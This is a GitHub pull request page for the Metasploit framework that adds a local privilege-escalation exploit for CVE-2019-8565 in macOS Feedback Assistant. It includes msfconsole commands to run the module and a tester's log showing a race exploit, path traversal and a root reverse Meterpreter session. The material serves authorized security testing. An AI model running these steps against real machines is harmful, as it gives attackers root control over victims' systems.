Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CVE-2019-8565 OSX Feedback Assistant local root exploit #11818

Merged
merged 2 commits into from May 20, 2019

Conversation

Projects
None yet
5 participants
@timwr
Copy link
Contributor

commented May 6, 2019

Similar to #11726, but quicker.
Thanks to @ChiChou

Verification

  • Start msfconsole
  • Get a (user) session on OSX < 10.14.4
  • Run the module:
use exploit/osx/local/feedback_assistant_root 
set SESSION -1
set LHOST <tab>
set LPORT 4445
exploit 
  • Verify you get a new session as root
  • Document the thing and how it works
@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented May 9, 2019

@msjenkins-r7 test this please.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 20, 2019

This exploit works for me over a Python meterpreter session:

msf5 exploit(osx/local/feedback_assistant_root) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.135.1:5555 
[*] Uploading file: '/tmp/.wdvrmfx'
[*] Uploading file: '/tmp/.xundvvt'
[*] Executing exploit '/tmp/.xundvvt'
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (808504 bytes) to 172.16.135.130
[*] Exploit result:
2019-05-20 10:16:11.516 .xundvvt[580:8272] [LightYear] canary: /usr/local/bin/netdiagnose
2019-05-20 10:16:11.516 .xundvvt[580:8272] [LightYear] dictionary: {
    "/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/BEB0AEB0-680C-481D-85A1-99936F345C60-580-0000010C2596EF15/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
}
2019-05-20 10:16:11.516 .xundvvt[580:8272] [LightYear] Now race
2019-05-20 10:16:12.106 .xundvvt[580:8272] [LightYear] Stage 1 succeed
2019-05-20 10:16:12.291 .xundvvt[580:8277] [LightYear] It works!
[*] Meterpreter session 20 opened (172.16.135.1:5555 -> 172.16.135.130:49249) at 2019-05-20 12:16:27 -0500

meterpreter > 

Tested platform: OS X High Sierra (10.13.6)

I'll try to add some content for the module documentation before I land it.

@wchen-r7 wchen-r7 self-assigned this May 20, 2019

@wchen-r7 wchen-r7 merged commit 7968bd9 into rapid7:master May 20, 2019

2 of 3 checks passed

continuous-integration/travis-ci/pr The Travis CI build failed
Details
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details

wchen-r7 added a commit that referenced this pull request May 20, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 20, 2019

Release Notes

This adds an exploit for CVE-2019-8565, an OSX Feedback Assistant local root exploit.

msjenkins-r7 added a commit that referenced this pull request May 20, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.